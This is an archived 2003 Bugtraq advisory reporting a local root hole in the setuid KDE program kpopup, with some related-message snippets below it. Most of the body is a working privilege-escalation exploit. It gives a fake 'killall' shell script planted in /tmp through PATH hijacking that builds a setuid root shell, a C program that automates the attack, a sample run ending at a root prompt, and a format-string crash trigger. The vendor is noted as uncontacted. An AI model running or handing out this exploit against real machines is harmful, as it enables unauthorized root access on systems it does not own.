Local root vuln in kpopup

From: b0f www.b0f.net (b0fnet_at_yahoo.com)
Date: 10/28/03

  • Next message: Sym Security: "RE: Norton Internet Security Blocked Sites XSS" 
    Date: 28 Oct 2003 18:12:43 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    A local root vuln exists in Kpopup version 0.9.1(latest) and
    proberly all other versions. It is avaliable from
    http://www.henschelsoft.de/kpopup_en.html (main site)
    http://www.freebsd.org/ports/net.html
    and many other places if you search kpopup on google.

    I. BACKGROUND

    Kpopup is a KDE program for sending and receiving MS Windows WinPopup
    messages. When package is compiled and install the binary kpopup gets
    installed suid root it also comes as part of FreeBSD ports collection.

    II. DESCRIPTION & EXPLOIT
    This app uses the system() call which is very unsafe expecially
    on a suid root binary. It also contains Format string bugs in the
    sprintf() function. In this advisory i will explain how to obtain
    root privlages from this app by exploiting system(). There is 3
    places on the misc.cpp source that use system(). The one we use to
    exploit this is on line 106.

    void sendSignalForNewMessage() {
        char command[50];
                                                                                    
        sprintf(command, "killall -USR1 kpopup");
        system(command);
    }

    To exploit this what we need to do is make a shell script and call it
    killall and place it in the /tmp directory. Here is a script that i
    wrote to exlpoit it.

    #!/bin/sh
    cd /tmp
    /bin/cat > shell.c << EOF
    #include <stdio.h>
    int main()
    {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "-bash", NULL);
    return 0;
    }
    EOF
    /usr/bin/gcc /tmp/shell.c -o /tmp/shell
    /bin/chown root.root shell
    /bin/chmod 6711 shell
    echo "NOW HERE IS YOUR ROOT SHELL"
    /tmp/shell

    so place this in /tmp as killall and chmod +x it. Now what we need to
    do is.
    export
    PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:

    Once this is done all we need to do is run the binary like so.
    /usr/local/kde/bin/kpopup root shell
    and thats it we now have root privs.

    an example run of this...

    [b0f@b0f b0f]$ export
    PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:
    [b0f@b0f b0f]$ /usr/local/kde/bin/kpopup root shell
    fileerror!
    NOW HERE IS YOUR ROOT SHELL
    [root@b0f tmp]#

    The format strings bugs are in that main.cpp source line 56 and 60
    they can be triggered by
    [b0f@b0f b0f]$ /usr/local/kde/bin/kpopup %n%n %n%n
    Segmentation fault
    [b0f@b0f b0f]$

    I haven't exploited the fmt bugs. There also seems to be possable race
    condtions
    in kpopup.

    III. EXPLOIT

    /*Local root exploit for kpopup
     *by b0f www.b0f.net
     */
    #include <stdio.h>
    int main()
    {
    setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\
    /usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
    FILE *fd;
    fd = fopen("/tmp/killall", "w");{
    fprintf(fd, "#!/bin/sh\n");
    fprintf(fd, "cd /tmp\n");
    fprintf(fd, "/bin/cat > shell.c << EOF\n");
    fprintf(fd, "#include <stdio.h>\n");
    fprintf(fd, "int main()\n");
    fprintf(fd, "{\n");
    fprintf(fd, "setuid(0);\n");
    fprintf(fd, "setgid(0);\n");
    fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");
    fprintf(fd, "return 0;\n");
    fprintf(fd, "}\n");
    fprintf(fd, "EOF\n");
    fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");
    fprintf(fd, "/bin/chown root.root /tmp/shell\n");
    fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");
    fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");
    fprintf(fd, "/tmp/shell\n");
    fclose(fd);
    system("chmod +x /tmp/killall");
    system("/usr/local/kde/bin/kpopup root shell");
    return 0;
    }
    }

    IV. ANALYSIS

    An attacker could exploit this issue on a machine running kpopup to
    obtain root privileges.

    V.DETECTION

    This is vulnerable in all versions off kpopup tested on Redhat 9.0

    VI. VENDOR

    The vendor has not been contacted about this issue.

    Regards
    b0f (Alan M)
    www.b0f.net

  • Next message: Sym Security: "RE: Norton Internet Security Blocked Sites XSS"

    Relevant Pages

    • [Full-Disclosure] Local root vuln in kpopup
      ... and many other places if you search kpopup on google. ... installed suid root it also comes as part of FreeBSD ... int main ... echo "NOW HERE IS YOUR ROOT SHELL" ...
      (Full-Disclosure)
    • RE: [Full-Disclosure] Local root vuln in kpopup
      ... Local root vuln in kpopup ... echo "NOW HERE IS YOUR ROOT SHELL" ... Full-Disclosure - We believe in it. ...
      (Full-Disclosure)
    • Re: No Root Shell with SUID /bin/bash
      ... if you intend to place a backdoor root shell for ... changed the root password) then you should write a ... this service is rarely shut down by an attacker). ... destaddress, int length){ ...
      (Focus-Linux)
    • prog for electronis lessons.
      ... int vars_count; ... return res; ... int comparator(const void *p1, const void *p2) ... int print_tree(NODE *root) ...
      (Debian-User)
    • Graphs and identifying adjacent nodes
      ... I have an applet which has a graph that has a central node (root) from ... int from; ...
      (comp.lang.java.programmer)